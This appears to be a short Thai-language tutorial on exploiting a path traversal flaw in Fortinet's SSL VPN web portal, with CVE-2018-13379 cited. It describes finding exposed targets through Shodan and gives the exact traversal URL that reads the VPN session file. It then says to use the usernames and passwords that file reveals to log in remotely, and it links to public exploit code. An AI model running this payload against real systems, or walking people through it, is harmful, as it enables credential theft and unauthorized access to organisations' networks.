บทนำ
ขั้นตอนเพื่อทดสอบหาช่องโหว่ ของ VPN web portal ของ Fortinet โดยใช้ช่องโหว่ Path traversal เพื่อดึง username และ password ของ หน้า login VPN ออกมา เพื่อดาวน์โหลด FotiClient console และจากการทดสอบสามารถใช้ username และ password ดังกล่าว login เพื่อ remote access
ขั้นตอน
- ค้นหาเป้าหมาย โดยสังเกตุได้จาก Logo หรือค้นหาจาก shodan
- ถ้าค้นหาโดย shodan สังเกตุ path “remote/fgt_lang”
- ทดลองเข้าผ่านเว็บเบราเซอร์จะได้หน้าตาดังรูป
- จากนั้นใน Field ภาษาให้เปลี่ยนเป็น File path
- ดังนี้
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
- จะปรากฏ username และ password ให้ทดลองนำไป login
- ตัวอย่างการ login ผ่าน FortiClient console.
อ้างอิง
- https://github.com/milo2012/CVE-2018-13379/blob/master/CVE-2018-13379.py
- https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/
- https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability.html
- https://www.exploit-db.com/exploits/47287